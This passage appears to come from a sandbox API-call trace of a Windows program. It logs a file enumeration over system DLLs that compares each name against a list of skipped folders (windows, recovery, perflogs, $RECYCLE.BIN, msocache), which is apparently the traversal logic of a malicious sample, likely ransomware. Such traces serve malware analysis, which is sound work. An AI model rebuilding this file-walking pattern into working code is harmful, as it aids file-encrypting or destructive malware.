cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0073.023] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0073.023] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-core-timezone-l1-1-0.dll", cchWideChar=35, lpMultiByteStr=0x22d0a0, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-core-timezone-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 35 [0073.023] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22beb0 | out: hHeap=0x1e0000) returned 1 [0073.024] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0073.024] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-core-timezone-l1-1-0.dll", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0073.024] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0073.024] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-core-timezone-l1-1-0.dll", cchWideChar=35, lpMultiByteStr=0x22d260, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-core-timezone-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 35 [0073.024] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0073.024] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0073.024] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0073.024] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0073.024] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0073.024] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd0c26cd1, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd0c26cd1, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd0e62fac, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d60, dwReserved0=0x60002, dwReserved1=0x23307e, cFileName="api-ms-win-core-xstate-l2-1-0.dll", cAlternateFileName="APA632~1.DLL")) returned 1 [0073.024] lstrcmpiW (lpString1="api-ms-win-core-xstate-l2-1-0.dll", lpString2=".") returned 1 [0073.024] lstrcmpiW (lpString1="api-ms-win-core-xstate-l2-1-0.dll", lpString2="..") returned 1 [0073.024] lstrcmpiW (lpString1="api-ms-win-core-xstate-l2-1-0.dll", lpString2="...") returned 1 [0073.024] lstrcmpiW (lpString1="api-ms-win-core-xstate-l2-1-0.dll", lpString2="windows") returned -1 [0073.024] lstrcmpiW (lpString1="api-ms-win-core-xstate-l2-1-0.dll", lpString2="recovery") returned -1 [0073.024] lstrcmpiW (lpString1="api-ms-win-core-xstate-l2-1-0.dll", lpString2="perflogs") returned -1 [0073.024] lstrcmpiW (lpString1="api-ms-win-core-xstate-l2-1-0.dll", lpString2="documents and settings") returned -1 [0073.024] lstrcmpiW (lpString1="api-ms-win-core-xstate-l2-1-0.dll", lpString2="$RECYCLE.BIN") returned 1 [0073.024] lstrcmpiW (lpString1="api-ms-win-core-xstate-l2-1-0.dll", lpString2="system volume information") returned -1 [0073.024] lstrcmpiW (lpString1="api-ms-win-core-xstate-l2-1-0.dll", lpString2="msocache") returned -1 [0073.024] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0073.024] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-core-xstate-l2-1-0.dll", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0073.024] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0073.024] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-core-xstate-l2-1-0.dll", cchWideChar=33, lpMultiByteStr=0x22d0a0, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-core-xstate-l2-1-0.dll", lpUsedDefaultChar=0x0) returned 33 [0073.024] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0073.024] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0073.024] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-core-xstate-l2-1-0.dll", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0073.024] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0073.024] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-core-xstate-l2-1-0.dll", cchWideChar=33, lpMultiByteStr=0x22d260, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-core-xstate-l2-1-0.dll", lpUsedDefaultChar=0x0) returned 33 [0073.024] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0073.024] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0073.024] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0073.024] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0073.024] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0073.025] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd289cda7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd289cda7, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd2a1a592, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4cc0, dwReserved0=0x60002, dwReserved1=0x23307e, cFileName="api-ms-win-crt-conio-l1-1-0.dll", cAlternateFileName="AP5C76~1.DLL")) returned 1 [0073.025] lstrcmpiW (lpString1="api-ms-win-crt-conio-l1-1-0.dll", lpString2=".") returned 1 [0073.025] lstrcmpiW (lpString1="api-ms-win-crt-conio-l1-1-0.dll", lpString2="..") returned 1 [0073.025] lstrcmpiW (lpString1="api-ms-win-crt-conio-l1-1-0.dll", lpString2="...") returned 1 [0073.025] lstrcmpiW (lpString1="api-ms-win-crt-conio-l1-1-0.dll", lpString2="windows") returned -1 [0073.025] lstrcmpiW (lpString1="api-ms-win-crt-conio-l1-1-0.dll", lpString2="recovery") returned -1 [0073.025] lstrcmpiW (lpString1="api-ms-win-crt-conio-l1-1-0.dll", lpString2="perflogs") returned -1 [0073.025] lstrcmpiW (lpString1="api-ms-win-crt-conio-l1-1-0.dll", lpString2="documents and settings") returned -1 [0073.025] lstrcmpiW (lpString1="api-ms-win-crt-conio-l1-1-0.dll", lpString2="$RECYCLE.BIN") returned 1 [0073.025] lstrcmpiW (lpString1="api-ms-win-crt-conio-l1-1-0.dll", lpString2="system volume information") returned -1 [0073.025] lstrcmpiW (lpString1="api-ms-win-crt-conio-l1-1-0.dll", lpString2="msocache") returned -1 [0073.025] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0073.025] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-conio-l1-1-0.dll", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0073.025] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0073.025] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-conio-l1-1-0.dll", cchWideChar=31, lpMultiByteStr=0x240fe8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-conio-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 31 [0073.025] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0073.025] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0073.025] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-conio-l1-1-0.dll", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0073.025] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0073.025] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-conio-l1-1-0.dll", cchWideChar=31, lpMultiByteStr=0x241038, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-conio-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 31 [0073.025] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0073.025] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0073.025] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0073.025] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0073.025] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0073.025] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd0b8e391, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd0b8e391, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd0d7e20c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x58c0, dwReserved0=0x60002, dwReserved1=0x23307e, cFileName="api-ms-win-crt-convert-l1-1-0.dll", cAlternateFileName="APFD9C~1.DLL")) returned 1 [0073.025] lstrcmpiW (lpString1="api-ms-win-crt-convert-l1-1-0.dll", lpString2=".") returned 1 [0073.025] lstrcmpiW (lpString1="api-ms-win-crt-convert-l1-1-0.dll", lpString2="..") returned 1 [0073.025] lstrcmpiW (lpString1="api-ms-win-crt-convert-l1-1-0.dll", lpString2="...") returned 1 [0073.025] lstrcmpiW (lpString1="api-ms-win-crt-convert-l1-1-0.dll", lpString2="windows") returned -1 [0073.025] lstrcmpiW (lpString1="api-ms-win-crt-convert-l1-1-0.dll", lpString2="recovery") returned -1 [0073.025] lstrcmpiW (lpString1="api-ms-win-crt-convert-l1-1-0.dll", lpString2="perflogs") returned -1 [0073.025] lstrcmpiW (lpString1="api-ms-win-crt-convert-l1-1-0.dll", lpString2="documents and settings") returned -1 [0073.025] lstrcmpiW (lpString1="api-ms-win-crt-convert-l1-1-0.dll", lpString2="$RECYCLE.BIN") returned 1 [0073.026] lstrcmpiW (lpString1="api-ms-win-crt-convert-l1-1-0.dll", lpString2="system volume information") returned -1 [0073.026] lstrcmpiW (lpString1="api-ms-win-crt-convert-l1-1-0.dll", lpString2="msocache") returned -1 [0073.026] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0073.026] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-convert-l1-1-0.dll", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0073.026] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0073.026] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-convert-l1-1-0.dll", cchWideChar=33, lpMultiByteStr=0x22d0a0, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-convert-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 33 [0073.026] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0073.026] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22beb0 [0073.026] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-convert-l1-1-0.dll", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0073.026] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0073.026] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-convert-l1-1-0.dll", cchWideChar=33, lpMultiByteStr=0x22d260, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-convert-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 33 [0073.026] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22beb0 | out: hHeap=0x1e0000) returned 1 [0073.026] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0073.026] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0073.026] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0073.026] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0073.026] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd0aa952a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd0aa952a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd0bda864, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4ac0, dwReserved0=0x60002, dwReserved1=0x23307e, cFileName="api-ms-win-crt-environment-l1-1-0.dll", cAlternateFileName="APC00F~1.DLL")) returned 1 [0073.026] lstrcmpiW (lpString1="api-ms-win-crt-environment-l1-1-0.dll", lpString2=".") returned 1 [0073.026] lstrcmpiW (lpString1="api-ms-win-crt-environment-l1-1-0.dll", lpString2="..") returned 1 [0073.026] lstrcmpiW (lpString1="api-ms-win-crt-environment-l1-1-0.dll", lpString2="...") returned 1 [0073.026] lstrcmpiW (lpString1="api-ms-win-crt-environment-l1-1-0.dll", lpString2="windows") returned -1 [0073.026] lstrcmpiW (lpString1="api-ms-win-crt-environment-l1-1-0.dll", lpString2="recovery") returned -1 [0073.026] lstrcmpiW (lpString1="api-ms-win-crt-environment-l1-1-0.dll", lpString2="perflogs") returned -1 [0073.026] lstrcmpiW (lpString1="api-ms-win-crt-environment-l1-1-0.dll", lpString2="documents and settings") returned -1 [0073.026] lstrcmpiW (lpString1="api-ms-win-crt-environment-l1-1-0.dll", lpString2="$RECYCLE.BIN") returned 1 [0073.026] lstrcmpiW (lpString1="api-ms-win-crt-environment-l1-1-0.dll", lpString2="system volume information") returned -1 [0073.026] lstrcmpiW (lpString1="api-ms-win-crt-environment-l1-1-0.dll", lpString2="msocache") returned -1 [0073.026] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c3d8 [0073.026] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-environment-l1-1-0.dll", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0073.026] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0073.026] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-environment-l1-1-0.dll", cchWideChar=37, lpMultiByteStr=0x22d0a0, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-environment-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 37 [0073.026] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c3d8 | out: hHeap=0x1e0000) returned 1 [0073.026] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7f8 [0073.026] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-environment-l1-1-0.dll", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0073.026] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0073.027] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-environment-l1-1-0.dll", cchWideChar=37, lpMultiByteStr=0x22d260, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-environment-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 37 [0073.027] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7f8 | out: hHeap=0x1e0000) returned 1 [0073.027] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0073.027] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0073.027] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0073.027] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0073.027] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd0aa952a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd0aa952a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd0c99389, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x50c0, dwReserved0=0x60002, dwReserved1=0x23307e, cFileName="api-ms-win-crt-filesystem-l1-1-0.dll", cAlternateFileName="API-MS~4.DLL")) returned 1 [0073.027] lstrcmpiW (lpString1="api-ms-win-crt-filesystem-l1-1-0.dll", lpString2=".") returned 1 [0073.027] lstrcmpiW (lpString1="api-ms-win-crt-filesystem-l1-1-0.dll", lpString2="..") returned 1 [0073.027] lstrcmpiW (lpString1="api-ms-win-crt-filesystem-l1-1-0.dll", lpString2="...") returned 1 [0073.027] lstrcmpiW (lpString1="api-ms-win-crt-filesystem-l1-1-0.dll", lpString2="windows") returned -1 [0073.027] lstrcmpiW (lpString1="api-ms-win-crt-filesystem-l1-1-0.dll", lpString2="recovery") returned -1 [0073.027] lstrcmpiW (lpString1="api-ms-win-crt-filesystem-l1-1-0.dll", lpString2="perflogs") returned -1 [0073.027] lstrcmpiW (lpString1="api-ms-win-crt-filesystem-l1-1-0.dll", lpString2="documents and settings") returned -1 [0073.027] lstrcmpiW (lpString1="api-ms-win-crt-filesystem-l1-1-0.dll", lpString2="$RECYCLE.BIN") returned 1 [0073.027] lstrcmpiW (lpString1="api-ms-win-crt-filesystem-l1-1-0.dll", lpString2="system volume information") returned -1 [0073.027] lstrcmpiW (lpString1="api-ms-win-crt-filesystem-l1-1-0.dll", lpString2="msocache") returned -1 [0073.027] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0073.027] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-filesystem-l1-1-0.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0073.027] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0073.027] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-filesystem-l1-1-0.dll", cchWideChar=36, lpMultiByteStr=0x22d298, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-filesystem-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 36 [0073.027] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0073.027] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c3d8 [0073.027] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-filesystem-l1-1-0.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0073.027] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0073.027] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-filesystem-l1-1-0.dll", cchWideChar=36, lpMultiByteStr=0x22d0a0, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-filesystem-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 36 [0073.027] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c3d8 | out: hHeap=0x1e0000) returned 1 [0073.027] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0073.027] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0073.027] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0073.027] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0073.027] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd0af5a16, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd0af5a16, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd0c4cdf5, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4cc0, dwReserved0=0x60002, dwReserved1=0x23307e, cFileName="api-ms-win-crt-heap-l1-1-0.dll", cAlternateFileName="AP23C9~1.DLL")) returned 1 [0073.027] lstrcmpiW (lpString1="api-ms-win-crt-heap-l1-1-0.dll", lpString2=".") returned 1 [0073.028] lstrcmpiW (lpString1="api-ms-win-crt-heap-l1-1-0.dll", lpString2="..") returned 1 [0073.028] lstrcmpiW (lpString1="api-ms-win-crt-heap-l1-1-0.dll", lpString2="...") returned 1 [0073.028] lstrcmpiW (lpString1="api-ms-win-crt-heap-l1-1-0.dll", lpString2="windows") returned -1 [0073.028] lstrcmpiW (lpString1="api-ms-win-crt-heap-l1-1-0.dll", lpString2="recovery") returned -1 [0073.028] lstrcmpiW (lpString1="api-ms-win-crt-heap-l1-1-0.dll", lpString2="perflogs") returned -1 [0073.028] lstrcmpiW (lpString1="api-ms-win-crt-heap-l1-1-0.dll", lpString2="documents and settings") returned -1 [0073.028] lstrcmpiW (lpString1="api-ms-win-crt-heap-l1-1-0.dll", lpString2="$RECYCLE.BIN") returned 1 [0073.028] lstrcmpiW (lpString1="api-ms-win-crt-heap-l1-1-0.dll", lpString2="system volume information") returned -1 [0073.028] lstrcmpiW (lpString1="api-ms-win-crt-heap-l1-1-0.dll", lpString2="msocache") returned -1 [0073.028] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0073.028] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-heap-l1-1-0.dll", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0073.028] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0073.028] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-heap-l1-1-0.dll", cchWideChar=30, lpMultiByteStr=0x2410d8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-heap-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 30 [0073.028] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0073.028] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0073.028] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-heap-l1-1-0.dll", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0073.028] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0073.028] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-heap-l1-1-0.dll", cchWideChar=30, lpMultiByteStr=0x241290, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-heap-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 30 [0073.028] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0073.028] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0073.028] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0073.028] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0073.028] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0073.028] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd1e086ac, 